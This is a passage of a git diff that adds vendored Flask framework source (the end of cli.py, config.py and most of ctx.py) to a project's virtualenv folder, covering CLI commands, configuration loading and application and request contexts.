This allows users to make a custom group callback + # without losing the behavior. --env-file must come first so + # that it is eagerly evaluated before --app. + params.extend((_env_file_option, _app_option, _debug_option)) + + if add_version_option: + params.append(version_option) + + if "context_settings" not in extra: + extra["context_settings"] = {} + + extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK") + + super().__init__(params=params, **extra) + + self.create_app = create_app + self.load_dotenv = load_dotenv + self.set_debug_flag = set_debug_flag + + if add_default_commands: + self.add_command(run_command) + self.add_command(shell_command) + self.add_command(routes_command) + + self._loaded_plugin_commands = False + + def _load_plugin_commands(self): + if self._loaded_plugin_commands: + return + + if sys.version_info >= (3, 10): + from importlib import metadata + else: + # Use a backport on Python < 3.10. We technically have + # importlib.metadata on 3.8+, but the API changed in 3.10, + # so use the backport for consistency. + import importlib_metadata as metadata + + for ep in metadata.entry_points(group="flask.commands"): + self.add_command(ep.load(), ep.name) + + self._loaded_plugin_commands = True + + def get_command(self, ctx, name): + self._load_plugin_commands() + # Look up built-in and plugin commands, which should be + # available even if the app fails to load. + rv = super().get_command(ctx, name) + + if rv is not None: + return rv + + info = ctx.ensure_object(ScriptInfo) + + # Look up commands provided by the app, showing an error and + # continuing if the app couldn't be loaded. + try: + app = info.load_app() + except NoAppException as e: + click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") + return None + + # Push an app context for the loaded app unless it is already + # active somehow. This makes the context available to parameter + # and command callbacks without needing @with_appcontext. + if not current_app or current_app._get_current_object() is not app: + ctx.with_resource(app.app_context()) + + return app.cli.get_command(ctx, name) + + def list_commands(self, ctx): + self._load_plugin_commands() + # Start with the built-in and plugin commands. + rv = set(super().list_commands(ctx)) + info = ctx.ensure_object(ScriptInfo) + + # Add commands provided by the app, showing an error and + # continuing if the app couldn't be loaded. + try: + rv.update(info.load_app().cli.list_commands(ctx)) + except NoAppException as e: + # When an app couldn't be loaded, show the error message + # without the traceback. + click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") + except Exception: + # When any other errors occurred during loading, show the + # full traceback. + click.secho(f"{traceback.format_exc()}\n", err=True, fg="red") + + return sorted(rv) + + def make_context( + self, + info_name: str | None, + args: list[str], + parent: click.Context | None = None, + **extra: t.Any, + ) -> click.Context: + # Set a flag to tell app.run to become a no-op. If app.run was + # not in a __name__ == __main__ guard, it would start the server + # when importing, blocking whatever command is being called. + os.environ["FLASK_RUN_FROM_CLI"] = "true" + + # Attempt to load .env and .flask env files. The --env-file + # option can cause another file to be loaded. 
+ if get_load_dotenv(self.load_dotenv): + load_dotenv() + + if "obj" not in extra and "obj" not in self.context_settings: + extra["obj"] = ScriptInfo( + create_app=self.create_app, set_debug_flag=self.set_debug_flag + ) + + return super().make_context(info_name, args, parent=parent, **extra) + + def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]: + if not args and self.no_args_is_help: + # Attempt to load --env-file and --app early in case they + # were given as env vars. Otherwise no_args_is_help will not + # see commands from app.cli. + _env_file_option.handle_parse_result(ctx, {}, []) + _app_option.handle_parse_result(ctx, {}, []) + + return super().parse_args(ctx, args) + + +def _path_is_ancestor(path, other): + """Take ``other`` and remove the length of ``path`` from it. Then join it + to ``path``. If it is the original value, ``path`` is an ancestor of + ``other``.""" + return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other + + +def load_dotenv(path: str | os.PathLike | None = None) -> bool: + """Load "dotenv" files in order of precedence to set environment variables. + + If an env var is already set it is not overwritten, so earlier files in the + list are preferred over later files. + + This is a no-op if `python-dotenv`_ is not installed. + + .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme + + :param path: Load the file at this location instead of searching. + :return: ``True`` if a file was loaded. + + .. versionchanged:: 2.0 + The current directory is not changed to the location of the + loaded file. + + .. versionchanged:: 2.0 + When loading the env files, set the default encoding to UTF-8. + + .. versionchanged:: 1.1.0 + Returns ``False`` when python-dotenv is not installed, or when + the given path isn't a file. + + .. versionadded:: 1.0 + """ + try: + import dotenv + except ImportError: + if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"): + click.secho( + " * Tip: There are .env or .flaskenv files present." + ' Do "pip install python-dotenv" to use them.', + fg="yellow", + err=True, + ) + + return False + + # Always return after attempting to load a given path, don't load + # the default files. + if path is not None: + if os.path.isfile(path): + return dotenv.load_dotenv(path, encoding="utf-8") + + return False + + loaded = False + + for name in (".env", ".flaskenv"): + path = dotenv.find_dotenv(name, usecwd=True) + + if not path: + continue + + dotenv.load_dotenv(path, encoding="utf-8") + loaded = True + + return loaded # True if at least one file was located and loaded. + + +def show_server_banner(debug, app_import_path): + """Show extra startup messages the first time the server is run, + ignoring the reloader. + """ + if is_running_from_reloader(): + return + + if app_import_path is not None: + click.echo(f" * Serving Flask app '{app_import_path}'") + + if debug is not None: + click.echo(f" * Debug mode: {'on' if debug else 'off'}") + + +class CertParamType(click.ParamType): + """Click option type for the ``--cert`` option. Allows either an + existing file, the string ``'adhoc'``, or an import for a + :class:`~ssl.SSLContext` object. 
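+    As an illustrative sketch only, an import string such as
+    ``'my_module:ctx'`` could point at a context object built like this
+    (module and file names are placeholders)::
+
+        import ssl
+
+        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+        ctx.load_cert_chain("cert.pem", "key.pem")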
+ """ + + name = "path" + + def __init__(self): + self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True) + + def convert(self, value, param, ctx): + try: + import ssl + except ImportError: + raise click.BadParameter( + 'Using "--cert" requires Python to be compiled with SSL support.', + ctx, + param, + ) from None + + try: + return self.path_type(value, param, ctx) + except click.BadParameter: + value = click.STRING(value, param, ctx).lower() + + if value == "adhoc": + try: + import cryptography # noqa: F401 + except ImportError: + raise click.BadParameter( + "Using ad-hoc certificates requires the cryptography library.", + ctx, + param, + ) from None + + return value + + obj = import_string(value, silent=True) + + if isinstance(obj, ssl.SSLContext): + return obj + + raise + + +def _validate_key(ctx, param, value): + """The ``--key`` option must be specified when ``--cert`` is a file. + Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed. + """ + cert = ctx.params.get("cert") + is_adhoc = cert == "adhoc" + + try: + import ssl + except ImportError: + is_context = False + else: + is_context = isinstance(cert, ssl.SSLContext) + + if value is not None: + if is_adhoc: + raise click.BadParameter( + 'When "--cert" is "adhoc", "--key" is not used.', ctx, param + ) + + if is_context: + raise click.BadParameter( + 'When "--cert" is an SSLContext object, "--key is not used.', ctx, param + ) + + if not cert: + raise click.BadParameter('"--cert" must also be specified.', ctx, param) + + ctx.params["cert"] = cert, value + + else: + if cert and not (is_adhoc or is_context): + raise click.BadParameter('Required when using "--cert".', ctx, param) + + return value + + +class SeparatedPathType(click.Path): + """Click option type that accepts a list of values separated by the + OS's path separator (``:``, ``;`` on Windows). Each value is + validated as a :class:`click.Path` type. + """ + + def convert(self, value, param, ctx): + items = self.split_envvar_value(value) + super_convert = super().convert + return [super_convert(item, param, ctx) for item in items] + + +@click.command("run", short_help="Run a development server.") +@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.") +@click.option("--port", "-p", default=5000, help="The port to bind to.") +@click.option( + "--cert", + type=CertParamType(), + help="Specify a certificate file to use HTTPS.", + is_eager=True, +) +@click.option( + "--key", + type=click.Path(exists=True, dir_okay=False, resolve_path=True), + callback=_validate_key, + expose_value=False, + help="The key file to use when specifying a certificate.", +) +@click.option( + "--reload/--no-reload", + default=None, + help="Enable or disable the reloader. By default the reloader " + "is active if debug is enabled.", +) +@click.option( + "--debugger/--no-debugger", + default=None, + help="Enable or disable the debugger. By default the debugger " + "is active if debug is enabled.", +) +@click.option( + "--with-threads/--without-threads", + default=True, + help="Enable or disable multithreading.", +) +@click.option( + "--extra-files", + default=None, + type=SeparatedPathType(), + help=( + "Extra files that trigger a reload on change. Multiple paths" + f" are separated by {os.path.pathsep!r}." + ), +) +@click.option( + "--exclude-patterns", + default=None, + type=SeparatedPathType(), + help=( + "Files matching these fnmatch patterns will not trigger a reload" + " on change. 
Multiple patterns are separated by" + f" {os.path.pathsep!r}." + ), +) +@pass_script_info +def run_command( + info, + host, + port, + reload, + debugger, + with_threads, + cert, + extra_files, + exclude_patterns, +): + """Run a local development server. + + This server is for development purposes only. It does not provide + the stability, security, or performance of production WSGI servers. + + The reloader and debugger are enabled by default with the '--debug' + option. + """ + try: + app = info.load_app() + except Exception as e: + if is_running_from_reloader(): + # When reloading, print out the error immediately, but raise + # it later so the debugger or server can handle it. + traceback.print_exc() + err = e + + def app(environ, start_response): + raise err from None + + else: + # When not reloading, raise the error immediately so the + # command fails. + raise e from None + + debug = get_debug_flag() + + if reload is None: + reload = debug + + if debugger is None: + debugger = debug + + show_server_banner(debug, info.app_import_path) + + run_simple( + host, + port, + app, + use_reloader=reload, + use_debugger=debugger, + threaded=with_threads, + ssl_context=cert, + extra_files=extra_files, + exclude_patterns=exclude_patterns, + ) + + +run_command.params.insert(0, _debug_option) + + +@click.command("shell", short_help="Run a shell in the app context.") +@with_appcontext +def shell_command() -> None: + """Run an interactive Python shell in the context of a given + Flask application. The application will populate the default + namespace of this shell according to its configuration. + + This is useful for executing small snippets of management code + without having to manually configure the application. + """ + import code + + banner = ( + f"Python {sys.version} on {sys.platform}\n" + f"App: {current_app.import_name}\n" + f"Instance: {current_app.instance_path}" + ) + ctx: dict = {} + + # Support the regular Python interpreter startup script if someone + # is using it. + startup = os.environ.get("PYTHONSTARTUP") + if startup and os.path.isfile(startup): + with open(startup) as f: + eval(compile(f.read(), startup, "exec"), ctx) + + ctx.update(current_app.make_shell_context()) + + # Site, customize, or startup script can set a hook to call when + # entering interactive mode. The default one sets up readline with + # tab and history completion. + interactive_hook = getattr(sys, "__interactivehook__", None) + + if interactive_hook is not None: + try: + import readline + from rlcompleter import Completer + except ImportError: + pass + else: + # rlcompleter uses __main__.__dict__ by default, which is + # flask.__main__. Use the shell context instead. + readline.set_completer(Completer(ctx).complete) + + interactive_hook() + + code.interact(banner=banner, local=ctx) + + +@click.command("routes", short_help="Show the routes for the app.") +@click.option( + "--sort", + "-s", + type=click.Choice(("endpoint", "methods", "domain", "rule", "match")), + default="endpoint", + help=( + "Method to sort routes by. 'match' is the order that Flask will match routes" + " when dispatching a request." 
+ ), +) +@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.") +@with_appcontext +def routes_command(sort: str, all_methods: bool) -> None: + """Show all registered routes with endpoints and methods.""" + rules = list(current_app.url_map.iter_rules()) + + if not rules: + click.echo("No routes were registered.") + return + + ignored_methods = set() if all_methods else {"HEAD", "OPTIONS"} + host_matching = current_app.url_map.host_matching + has_domain = any(rule.host if host_matching else rule.subdomain for rule in rules) + rows = [] + + for rule in rules: + row = [ + rule.endpoint, + ", ".join(sorted((rule.methods or set()) - ignored_methods)), + ] + + if has_domain: + row.append((rule.host if host_matching else rule.subdomain) or "") + + row.append(rule.rule) + rows.append(row) + + headers = ["Endpoint", "Methods"] + sorts = ["endpoint", "methods"] + + if has_domain: + headers.append("Host" if host_matching else "Subdomain") + sorts.append("domain") + + headers.append("Rule") + sorts.append("rule") + + try: + rows.sort(key=itemgetter(sorts.index(sort))) + except ValueError: + pass + + rows.insert(0, headers) + widths = [max(len(row[i]) for row in rows) for i in range(len(headers))] + rows.insert(1, ["-" * w for w in widths]) + template = " ".join(f"{{{i}:<{w}}}" for i, w in enumerate(widths)) + + for row in rows: + click.echo(template.format(*row)) + + +cli = FlaskGroup( + name="flask", + help="""\ +A general utility script for Flask applications. + +An application to load must be given with the '--app' option, +'FLASK_APP' environment variable, or with a 'wsgi.py' or 'app.py' file +in the current directory. +""", +) + + +def main() -> None: + cli.main() + + +if __name__ == "__main__": + main() diff --git a/env/Lib/site-packages/flask/config.py b/env/Lib/site-packages/flask/config.py new file mode 100644 index 00000000..5f921b4d --- /dev/null +++ b/env/Lib/site-packages/flask/config.py @@ -0,0 +1,347 @@ +from __future__ import annotations + +import errno +import json +import os +import types +import typing as t + +from werkzeug.utils import import_string + + +class ConfigAttribute: + """Makes an attribute forward to the config""" + + def __init__(self, name: str, get_converter: t.Callable | None = None) -> None: + self.__name__ = name + self.get_converter = get_converter + + def __get__(self, obj: t.Any, owner: t.Any = None) -> t.Any: + if obj is None: + return self + rv = obj.config[self.__name__] + if self.get_converter is not None: + rv = self.get_converter(rv) + return rv + + def __set__(self, obj: t.Any, value: t.Any) -> None: + obj.config[self.__name__] = value + + +class Config(dict): + """Works exactly like a dict but provides ways to fill it from files + or special dictionaries. There are two common patterns to populate the + config. + + Either you can fill the config from a config file:: + + app.config.from_pyfile('yourconfig.cfg') + + Or alternatively you can define the configuration options in the + module that calls :meth:`from_object` or provide an import path to + a module that should be loaded. It is also possible to tell it to + use the same module and with that provide the configuration values + just before the call:: + + DEBUG = True + SECRET_KEY = 'development key' + app.config.from_object(__name__) + + In both cases (loading from any Python file or loading from modules), + only uppercase keys are added to the config. 
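+    For instance, a hypothetical ``settings.py`` module used with
+    :meth:`from_object` could contain the following; only the
+    uppercase names end up in the config::
+
+        DEBUG = False             # loaded
+        SECRET_KEY = "dev-key"    # loaded
+        _internal_counter = 0     # ignored, not uppercase
+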
This makes it possible to use + lowercase values in the config file for temporary values that are not added + to the config or to define the config keys in the same file that implements + the application. + + Probably the most interesting way to load configurations is from an + environment variable pointing to a file:: + + app.config.from_envvar('YOURAPPLICATION_SETTINGS') + + In this case before launching the application you have to set this + environment variable to the file you want to use. On Linux and OS X + use the export statement:: + + export YOURAPPLICATION_SETTINGS='/path/to/config/file' + + On windows use `set` instead. + + :param root_path: path to which files are read relative from. When the + config object is created by the application, this is + the application's :attr:`~flask.Flask.root_path`. + :param defaults: an optional dictionary of default values + """ + + def __init__( + self, root_path: str | os.PathLike, defaults: dict | None = None + ) -> None: + super().__init__(defaults or {}) + self.root_path = root_path + + def from_envvar(self, variable_name: str, silent: bool = False) -> bool: + """Loads a configuration from an environment variable pointing to + a configuration file. This is basically just a shortcut with nicer + error messages for this line of code:: + + app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS']) + + :param variable_name: name of the environment variable + :param silent: set to ``True`` if you want silent failure for missing + files. + :return: ``True`` if the file was loaded successfully. + """ + rv = os.environ.get(variable_name) + if not rv: + if silent: + return False + raise RuntimeError( + f"The environment variable {variable_name!r} is not set" + " and as such configuration could not be loaded. Set" + " this variable and make it point to a configuration" + " file" + ) + return self.from_pyfile(rv, silent=silent) + + def from_prefixed_env( + self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads + ) -> bool: + """Load any environment variables that start with ``FLASK_``, + dropping the prefix from the env key for the config key. Values + are passed through a loading function to attempt to convert them + to more specific types than strings. + + Keys are loaded in :func:`sorted` order. + + The default loading function attempts to parse values as any + valid JSON type, including dicts and lists. + + Specific items in nested dicts can be set by separating the + keys with double underscores (``__``). If an intermediate key + doesn't exist, it will be initialized to an empty dict. + + :param prefix: Load env vars that start with this prefix, + separated with an underscore (``_``). + :param loads: Pass each string value to this function and use + the returned value as the config value. If any error is + raised it is ignored and the value remains a string. The + default is :func:`json.loads`. + + .. versionadded:: 2.1 + """ + prefix = f"{prefix}_" + len_prefix = len(prefix) + + for key in sorted(os.environ): + if not key.startswith(prefix): + continue + + value = os.environ[key] + + try: + value = loads(value) + except Exception: + # Keep the value as a string if loading failed. + pass + + # Change to key.removeprefix(prefix) on Python >= 3.9. + key = key[len_prefix:] + + if "__" not in key: + # A non-nested key, set directly. + self[key] = value + continue + + # Traverse nested dictionaries with keys separated by "__". 
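+            # Illustrative example (hypothetical variable): with
+            # FLASK_MYAPP__DATABASE__PORT=5432 set in the environment,
+            # ``key`` is "MYAPP__DATABASE__PORT" at this point and the
+            # loop below produces config["MYAPP"]["DATABASE"]["PORT"] = 5432.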
+ current = self + *parts, tail = key.split("__") + + for part in parts: + # If an intermediate dict does not exist, create it. + if part not in current: + current[part] = {} + + current = current[part] + + current[tail] = value + + return True + + def from_pyfile(self, filename: str | os.PathLike, silent: bool = False) -> bool: + """Updates the values in the config from a Python file. This function + behaves as if the file was imported as module with the + :meth:`from_object` function. + + :param filename: the filename of the config. This can either be an + absolute filename or a filename relative to the + root path. + :param silent: set to ``True`` if you want silent failure for missing + files. + :return: ``True`` if the file was loaded successfully. + + .. versionadded:: 0.7 + `silent` parameter. + """ + filename = os.path.join(self.root_path, filename) + d = types.ModuleType("config") + d.__file__ = filename + try: + with open(filename, mode="rb") as config_file: + exec(compile(config_file.read(), filename, "exec"), d.__dict__) + except OSError as e: + if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR): + return False + e.strerror = f"Unable to load configuration file ({e.strerror})" + raise + self.from_object(d) + return True + + def from_object(self, obj: object | str) -> None: + """Updates the values from the given object. An object can be of one + of the following two types: + + - a string: in this case the object with that name will be imported + - an actual object reference: that object is used directly + + Objects are usually either modules or classes. :meth:`from_object` + loads only the uppercase attributes of the module/class. A ``dict`` + object will not work with :meth:`from_object` because the keys of a + ``dict`` are not attributes of the ``dict`` class. + + Example of module-based configuration:: + + app.config.from_object('yourapplication.default_config') + from yourapplication import default_config + app.config.from_object(default_config) + + Nothing is done to the object before loading. If the object is a + class and has ``@property`` attributes, it needs to be + instantiated before being passed to this method. + + You should not use this function to load the actual configuration but + rather configuration defaults. The actual config should be loaded + with :meth:`from_pyfile` and ideally from a location not within the + package because the package might be installed system wide. + + See :ref:`config-dev-prod` for an example of class-based configuration + using :meth:`from_object`. + + :param obj: an import name or object + """ + if isinstance(obj, str): + obj = import_string(obj) + for key in dir(obj): + if key.isupper(): + self[key] = getattr(obj, key) + + def from_file( + self, + filename: str | os.PathLike, + load: t.Callable[[t.IO[t.Any]], t.Mapping], + silent: bool = False, + text: bool = True, + ) -> bool: + """Update the values in the config from a file that is loaded + using the ``load`` parameter. The loaded data is passed to the + :meth:`from_mapping` method. + + .. code-block:: python + + import json + app.config.from_file("config.json", load=json.load) + + import tomllib + app.config.from_file("config.toml", load=tomllib.load, text=False) + + :param filename: The path to the data file. This can be an + absolute path or relative to the config root path. + :param load: A callable that takes a file handle and returns a + mapping of loaded data from the file. 
+ :type load: ``Callable[[Reader], Mapping]`` where ``Reader`` + implements a ``read`` method. + :param silent: Ignore the file if it doesn't exist. + :param text: Open the file in text or binary mode. + :return: ``True`` if the file was loaded successfully. + + .. versionchanged:: 2.3 + The ``text`` parameter was added. + + .. versionadded:: 2.0 + """ + filename = os.path.join(self.root_path, filename) + + try: + with open(filename, "r" if text else "rb") as f: + obj = load(f) + except OSError as e: + if silent and e.errno in (errno.ENOENT, errno.EISDIR): + return False + + e.strerror = f"Unable to load configuration file ({e.strerror})" + raise + + return self.from_mapping(obj) + + def from_mapping( + self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any + ) -> bool: + """Updates the config like :meth:`update` ignoring items with + non-upper keys. + + :return: Always returns ``True``. + + .. versionadded:: 0.11 + """ + mappings: dict[str, t.Any] = {} + if mapping is not None: + mappings.update(mapping) + mappings.update(kwargs) + for key, value in mappings.items(): + if key.isupper(): + self[key] = value + return True + + def get_namespace( + self, namespace: str, lowercase: bool = True, trim_namespace: bool = True + ) -> dict[str, t.Any]: + """Returns a dictionary containing a subset of configuration options + that match the specified namespace/prefix. Example usage:: + + app.config['IMAGE_STORE_TYPE'] = 'fs' + app.config['IMAGE_STORE_PATH'] = '/var/app/images' + app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com' + image_store_config = app.config.get_namespace('IMAGE_STORE_') + + The resulting dictionary `image_store_config` would look like:: + + { + 'type': 'fs', + 'path': '/var/app/images', + 'base_url': 'http://img.website.com' + } + + This is often useful when configuration options map directly to + keyword arguments in functions or class constructors. + + :param namespace: a configuration namespace + :param lowercase: a flag indicating if the keys of the resulting + dictionary should be lowercase + :param trim_namespace: a flag indicating if the keys of the resulting + dictionary should not include the namespace + + .. versionadded:: 0.11 + """ + rv = {} + for k, v in self.items(): + if not k.startswith(namespace): + continue + if trim_namespace: + key = k[len(namespace) :] + else: + key = k + if lowercase: + key = key.lower() + rv[key] = v + return rv + + def __repr__(self) -> str: + return f"<{type(self).__name__} {dict.__repr__(self)}>" diff --git a/env/Lib/site-packages/flask/ctx.py b/env/Lib/site-packages/flask/ctx.py new file mode 100644 index 00000000..b37e4e04 --- /dev/null +++ b/env/Lib/site-packages/flask/ctx.py @@ -0,0 +1,440 @@ +from __future__ import annotations + +import contextvars +import sys +import typing as t +from functools import update_wrapper +from types import TracebackType + +from werkzeug.exceptions import HTTPException + +from . import typing as ft +from .globals import _cv_app +from .globals import _cv_request +from .signals import appcontext_popped +from .signals import appcontext_pushed + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .sessions import SessionMixin + from .wrappers import Request + + +# a singleton sentinel value for parameter defaults +_sentinel = object() + + +class _AppCtxGlobals: + """A plain object. Used as a namespace for storing data during an + application context. + + Creating an app context automatically creates this object, which is + made available as the :data:`g` proxy. 
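+    A common use (a sketch; ``connect_db`` is a hypothetical helper)
+    is caching a per-context resource on :data:`g`::
+
+        from flask import g
+
+        def get_db():
+            if "db" not in g:
+                g.db = connect_db()
+            return g.db
+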
+ + .. describe:: 'key' in g + + Check whether an attribute is present. + + .. versionadded:: 0.10 + + .. describe:: iter(g) + + Return an iterator over the attribute names. + + .. versionadded:: 0.10 + """ + + # Define attr methods to let mypy know this is a namespace object + # that has arbitrary attributes. + + def __getattr__(self, name: str) -> t.Any: + try: + return self.__dict__[name] + except KeyError: + raise AttributeError(name) from None + + def __setattr__(self, name: str, value: t.Any) -> None: + self.__dict__[name] = value + + def __delattr__(self, name: str) -> None: + try: + del self.__dict__[name] + except KeyError: + raise AttributeError(name) from None + + def get(self, name: str, default: t.Any | None = None) -> t.Any: + """Get an attribute by name, or a default value. Like + :meth:`dict.get`. + + :param name: Name of attribute to get. + :param default: Value to return if the attribute is not present. + + .. versionadded:: 0.10 + """ + return self.__dict__.get(name, default) + + def pop(self, name: str, default: t.Any = _sentinel) -> t.Any: + """Get and remove an attribute by name. Like :meth:`dict.pop`. + + :param name: Name of attribute to pop. + :param default: Value to return if the attribute is not present, + instead of raising a ``KeyError``. + + .. versionadded:: 0.11 + """ + if default is _sentinel: + return self.__dict__.pop(name) + else: + return self.__dict__.pop(name, default) + + def setdefault(self, name: str, default: t.Any = None) -> t.Any: + """Get the value of an attribute if it is present, otherwise + set and return a default value. Like :meth:`dict.setdefault`. + + :param name: Name of attribute to get. + :param default: Value to set and return if the attribute is not + present. + + .. versionadded:: 0.11 + """ + return self.__dict__.setdefault(name, default) + + def __contains__(self, item: str) -> bool: + return item in self.__dict__ + + def __iter__(self) -> t.Iterator[str]: + return iter(self.__dict__) + + def __repr__(self) -> str: + ctx = _cv_app.get(None) + if ctx is not None: + return f"" + return object.__repr__(self) + + +def after_this_request(f: ft.AfterRequestCallable) -> ft.AfterRequestCallable: + """Executes a function after this request. This is useful to modify + response objects. The function is passed the response object and has + to return the same or a new one. + + Example:: + + @app.route('/') + def index(): + @after_this_request + def add_header(response): + response.headers['X-Foo'] = 'Parachute' + return response + return 'Hello World!' + + This is more useful if a function other than the view function wants to + modify a response. For instance think of a decorator that wants to add + some headers without converting the return value into a response object. + + .. versionadded:: 0.9 + """ + ctx = _cv_request.get(None) + + if ctx is None: + raise RuntimeError( + "'after_this_request' can only be used when a request" + " context is active, such as in a view function." + ) + + ctx._after_request_functions.append(f) + return f + + +def copy_current_request_context(f: t.Callable) -> t.Callable: + """A helper function that decorates a function to retain the current + request context. This is useful when working with greenlets. The moment + the function is decorated a copy of the request context is created and + then pushed when the function is called. The current session is also + included in the copied request context. 
+ + Example:: + + import gevent + from flask import copy_current_request_context + + @app.route('/') + def index(): + @copy_current_request_context + def do_some_work(): + # do some work here, it can access flask.request or + # flask.session like you would otherwise in the view function. + ... + gevent.spawn(do_some_work) + return 'Regular response' + + .. versionadded:: 0.10 + """ + ctx = _cv_request.get(None) + + if ctx is None: + raise RuntimeError( + "'copy_current_request_context' can only be used when a" + " request context is active, such as in a view function." + ) + + ctx = ctx.copy() + + def wrapper(*args, **kwargs): + with ctx: + return ctx.app.ensure_sync(f)(*args, **kwargs) + + return update_wrapper(wrapper, f) + + +def has_request_context() -> bool: + """If you have code that wants to test if a request context is there or + not this function can be used. For instance, you may want to take advantage + of request information if the request object is available, but fail + silently if it is unavailable. + + :: + + class User(db.Model): + + def __init__(self, username, remote_addr=None): + self.username = username + if remote_addr is None and has_request_context(): + remote_addr = request.remote_addr + self.remote_addr = remote_addr + + Alternatively you can also just test any of the context bound objects + (such as :class:`request` or :class:`g`) for truthness:: + + class User(db.Model): + + def __init__(self, username, remote_addr=None): + self.username = username + if remote_addr is None and request: + remote_addr = request.remote_addr + self.remote_addr = remote_addr + + .. versionadded:: 0.7 + """ + return _cv_request.get(None) is not None + + +def has_app_context() -> bool: + """Works like :func:`has_request_context` but for the application + context. You can also just do a boolean check on the + :data:`current_app` object instead. + + .. versionadded:: 0.9 + """ + return _cv_app.get(None) is not None + + +class AppContext: + """The app context contains application-specific information. An app + context is created and pushed at the beginning of each request if + one is not already active. An app context is also pushed when + running CLI commands. + """ + + def __init__(self, app: Flask) -> None: + self.app = app + self.url_adapter = app.create_url_adapter(None) + self.g: _AppCtxGlobals = app.app_ctx_globals_class() + self._cv_tokens: list[contextvars.Token] = [] + + def push(self) -> None: + """Binds the app context to the current context.""" + self._cv_tokens.append(_cv_app.set(self)) + appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync) + + def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore + """Pops the app context.""" + try: + if len(self._cv_tokens) == 1: + if exc is _sentinel: + exc = sys.exc_info()[1] + self.app.do_teardown_appcontext(exc) + finally: + ctx = _cv_app.get() + _cv_app.reset(self._cv_tokens.pop()) + + if ctx is not self: + raise AssertionError( + f"Popped wrong app context. ({ctx!r} instead of {self!r})" + ) + + appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync) + + def __enter__(self) -> AppContext: + self.push() + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.pop(exc_value) + + +class RequestContext: + """The request context contains per-request information. The Flask + app creates and pushes it at the beginning of the request, then pops + it at the end of the request. 
It will create the URL adapter and + request object for the WSGI environment provided. + + Do not attempt to use this class directly, instead use + :meth:`~flask.Flask.test_request_context` and + :meth:`~flask.Flask.request_context` to create this object. + + When the request context is popped, it will evaluate all the + functions registered on the application for teardown execution + (:meth:`~flask.Flask.teardown_request`). + + The request context is automatically popped at the end of the + request. When using the interactive debugger, the context will be + restored so ``request`` is still accessible. Similarly, the test + client can preserve the context after the request ends. However, + teardown functions may already have closed some resources such as + database connections. + """ + + def __init__( + self, + app: Flask, + environ: dict, + request: Request | None = None, + session: SessionMixin | None = None, + ) -> None: + self.app = app + if request is None: + request = app.request_class(environ) + request.json_module = app.json + self.request: Request = request + self.url_adapter = None + try: + self.url_adapter = app.create_url_adapter(self.request) + except HTTPException as e: + self.request.routing_exception = e + self.flashes: list[tuple[str, str]] | None = None + self.session: SessionMixin | None = session + # Functions that should be executed after the request on the response + # object. These will be called before the regular "after_request" + # functions. + self._after_request_functions: list[ft.AfterRequestCallable] = [] + + self._cv_tokens: list[tuple[contextvars.Token, AppContext | None]] = [] + + def copy(self) -> RequestContext: + """Creates a copy of this request context with the same request object. + This can be used to move a request context to a different greenlet. + Because the actual request object is the same this cannot be used to + move a request context to a different thread unless access to the + request object is locked. + + .. versionadded:: 0.10 + + .. versionchanged:: 1.1 + The current session object is used instead of reloading the original + data. This prevents `flask.session` pointing to an out-of-date object. + """ + return self.__class__( + self.app, + environ=self.request.environ, + request=self.request, + session=self.session, + ) + + def match_request(self) -> None: + """Can be overridden by a subclass to hook into the matching + of the request. + """ + try: + result = self.url_adapter.match(return_rule=True) # type: ignore + self.request.url_rule, self.request.view_args = result # type: ignore + except HTTPException as e: + self.request.routing_exception = e + + def push(self) -> None: + # Before we push the request context we have to ensure that there + # is an application context. + app_ctx = _cv_app.get(None) + + if app_ctx is None or app_ctx.app is not self.app: + app_ctx = self.app.app_context() + app_ctx.push() + else: + app_ctx = None + + self._cv_tokens.append((_cv_request.set(self), app_ctx)) + + # Open the session at the moment that the request context is available. + # This allows a custom open_session method to use the request context. + # Only open a new session if this is the first time the request was + # pushed, otherwise stream_with_context loses the session. 
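+        # Note: ``open_session`` may return None (the default cookie
+        # session does this when no secret key is configured); the code
+        # below then falls back to a null session object.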
+ if self.session is None: + session_interface = self.app.session_interface + self.session = session_interface.open_session(self.app, self.request) + + if self.session is None: + self.session = session_interface.make_null_session(self.app) + + # Match the request URL after loading the session, so that the + # session is available in custom URL converters. + if self.url_adapter is not None: + self.match_request() + + def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore + """Pops the request context and unbinds it by doing that. This will + also trigger the execution of functions registered by the + :meth:`~flask.Flask.teardown_request` decorator. + + .. versionchanged:: 0.9 + Added the `exc` argument. + """ + clear_request = len(self._cv_tokens) == 1 + + try: + if clear_request: + if exc is _sentinel: + exc = sys.exc_info()[1] + self.app.do_teardown_request(exc) + + request_close = getattr(self.request, "close", None) + if request_close is not None: + request_close() + finally: + ctx = _cv_request.get() + token, app_ctx = self._cv_tokens.pop() + _cv_request.reset(token) + + # get rid of circular dependencies at the end of the request + # so that we don't require the GC to be active. + if clear_request: + ctx.request.environ["werkzeug.request"] = None + + if app_ctx is not None: + app_ctx.pop(exc) + + if ctx is not self: + raise AssertionError( + f"Popped wrong request context. ({ctx!r} instead of {self!r})" + ) + + def __enter__(self) -> RequestContext: + self.push() + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.pop(exc_value) + + def __repr__(self) -> str: + return ( + f"<{type(self).__name__} {self.request.url!r}" + f" 